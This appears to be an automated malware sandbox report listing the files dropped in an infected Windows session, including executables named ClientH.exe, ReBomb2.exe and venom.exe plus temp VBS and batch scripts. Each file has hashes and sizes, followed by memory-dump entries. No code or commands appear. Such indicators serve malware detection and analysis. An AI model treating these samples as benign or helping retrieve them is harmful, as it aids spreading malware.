C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ClientH.exe.log

Filesize
418B

MD5
2b515e4c710de3996e77f7532379e990

SHA1
c865f620729ee3ad46eb61d70c5b1a45bfa2d063

SHA256
7106e5e9c17ff1404df40c65f7513bf688ffb39bbac7e92f0c7e3397a2c7e9ab

SHA512
40420bc50227a6a74b01d796eb7739434ae8de3493d3243791cb222f867c2f1ca0451ce2e79737114dfdc15cb87b85d36424eb65fc13c62bcfd2b78858043823

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
1c756156bfba053a3f0222e0d5ac8cf0

SHA1
80d7f3c9af86ecd913fd3cb5968b0b9e1cf56a50

SHA256
17f0767e9896bd1a90a66cb6c10f721875cad5d323be9a759dfa70db7c7d88ca

SHA512
21ba427fbd32d01d7db5faab313d45ac7cbfa0b4c9f4a74606fd4c1be5ce03143303b32969ef2d5895b4e56894cf7f98b387092702d10d1374ea6e470813ce36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
76b52ccdb5682f80e9830a765e4f9604

SHA1
e0f063114a8463b5a6f44858738a7ffdc2fe9061

SHA256
2428d24df851b6e7b5cfa7a1d76e19e0f853ae0f63d95675d1e6d2f73685ee7e

SHA512
af544fcaf4702a619aeaa1534069fcfd82afd74402d6a58318ebd949ee47d55fc0043aa87a499864174e5cda1b47bd0ba0f90d441f974de1c50840b21a8fefad

Download Submit
C:\Users\Admin\AppData\Local\Temp\ClientH.exe

Filesize
90KB

MD5
63999d7403b272a3fa02167440049a33

SHA1
35c5b45786fcf72749c2b76ce32d770604b38f9b

SHA256
1797c87878d7ea2a8f56f7a27bd0f917c511186a30a9f4bfed054ba65ebb56b7

SHA512
d945e73b710adc6a4e8aea56d3cc3f61ce7da4f4d2d6edb00579f3f49a7b3cbd43b94a4c47848345ba23088b2e7d996514619b868217faa4ac46b89a264fb301

Download Submit
C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe

Filesize
8.8MB

MD5
11f3d124b89d4c6a737f993442e15259

SHA1
290b45651633021d3afd4bdedf8f03c2c705cf11

SHA256
80d1631227d5b253b69f1004286c4562e765d54be593ac0b6ad0d34b35275f94

SHA512
43822db6a9dd226579c136e7049012714fb54ca4915fdf4b4ba92e2a72380b1b56de7a9a6cef79e9b62139e36244812955ca4bb2ff8991f03ef96f929d95b4f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs

Filesize
896B

MD5
8fb276ac35a3a884b76803313460e489

SHA1
93618fd292722ed49e668cdf00f75cb5a58ae402

SHA256
fefd5dae1f3c47da60f619f7423e8528e8acc80aa31e963a14e9f3e9be8df334

SHA512
51d963b008f4cbb1fc0844c8147f51c2375754f3db58d588a279f164ceb2c902f66d067e3143e0ddc2f981bcc46195c60177822074c7ff0f79945ee45ec7e5c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5dtnkiqw.njk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp851E.tmp.bat

Filesize
150B

MD5
923c70951d2dabf4ea5bfd85e92bfd9d

SHA1
a05872456eae538ea5cb83d7740f9b14235c7825

SHA256
8f2427b38975d9c4d86da22ce0b0d97f43b04816d6198676b2c10e8072f332e5

SHA512
7ecc03a5276f3843f4bea1a55a2d1dd9c0636b823085ed00398e5fcb321d75b7614f106caa9416f8df843a566f9ac120b5faeec3ea0eee47d039e589944c0d8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\venom.exe

Filesize
63KB

MD5
397f5b1c5cbba64b357dcdbc041c0c76

SHA1
ab368a38ad1e26a00e5828fecc6d092669da8ff6

SHA256
2bacc73b133acd79185f75edd32b60f24bb23d9ad08125ccc36cbd2d389ce2e4

SHA512
bc7fe11c434d4c13e7800d620904c43a19a00a571f74b19a794001041c796d34196800dae3e3f4db67e832d20e865a476ad002c40ebf9f25a6295642ce09b490

Download Submit
memory/276-69-0x0000000005450000-0x00000000054E2000-memory.dmp

Filesize
584KB

Download
memory/760-74-0x00000000059E0000-0x000000000600A000-memory.dmp

Filesize
6.2MB

Download
memory/760-269-0x0000000007CE0000-0x0000000007D02000-memory.dmp

Filesize
136KB

Download
memory/760-136-0x0000000006D60000-0x0000000006DAC000-memory.dmp

Filesize
304KB

Download
memory/760-135-0x0000000006760000-0x000000000677E000-memory.dmp

Filesize
120KB

Download
memory/760-71-0x0000000005370000-0x00000000053A6000-memory.dmp

Filesize
216KB

Download
memory/760-96-0x0000000006010000-0x0000000006076000-memory.dmp

Filesize
408KB

Download
memory/760-97-0x0000000006080000-0x00000000060E6000-memory.dmp

Filesize
408KB

Download
memory/760-187-0x0000000008110000-0x000000000878A000-memory.dmp

Filesize
6.5MB

Download
memory/760-188-0x00000000078D0000-0x00000000078EA000-memory.dmp

Filesize
104KB

Download
memory/760-268-0x0000000007D50000-0x0000000007DE6000-memory.dmp

Filesize
600KB

Download
memory/760-107-0x00000000060F0000-0x0000000006447000-memory.dmp

Filesize
3.3MB

Download
memory/760-95-0x0000000005910000-0x0000000005932000-memory.dmp

Filesize
136KB

Download
memory/1132-44-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1556-1117-0x0000000073250000-0x000000007329C000-memory.dmp

Filesize
304KB

Download
memory/3404-39-0x00000000055C0000-0x0000000005B66000-memory.dmp

Filesize
5.6MB

Download
memory/3404-31-0x0000000000750000-0x000000000076C000-memory.dmp

Filesize
112KB

Download
memory/3532-41-0x0000000004B70000-0x0000000004C0C000-memory.dmp

Filesize
624KB

Download
memory/4236-27-0x0000000000A60000-0x0000000000A76000-memory.dmp

Filesize
88KB

Download
memory/4236-28-0x00007FFFCB093000-0x00007FFFCB095000-memory.dmp

Filesize
8KB

Download
memory/4672-1149-0x0000000073250000-0x000000007329C000-memory.dmp

Filesize
304KB

Download
memory/5936-1318-0x0000000073250000-0x000000007329C000-memory.dmp

Filesize
304KB

Download
memory/6764-953-0x0000000007010000-0x00000000070B4000-memory.dmp

Filesize
656KB

Download
memory/6764-1007-0x0000000005B90000-0x0000000005BA1000-memory.dmp

Filesize
68KB

Download
memory/6764-952-0x0000000006300000-0x000000000631E000-memory.dmp

Filesize
120KB

Download
memory/6764-935-0x0000000073250000-0x000000007329C000-memory.dmp

Filesize
304KB

Download
memory/6764-934-0x0000000006FD0000-0x0000000007004000-memory.dmp

Filesize
208KB

Download
memory/6764-965-0x0000000005760000-0x000000000576A000-memory.dmp

Filesize
40KB

Download
memory/7480-1191-0x0000000073250000-0x000000007329C000-memory.dmp

Filesize
304KB

Download
memory/7780-1182-0x0000000073250000-0x000000007329C000-memory.dmp

Filesize
304KB

Download
memory/7976-1094-0x0000000073250000-0x000000007329C000-memory.dmp

Filesize
304KB

Download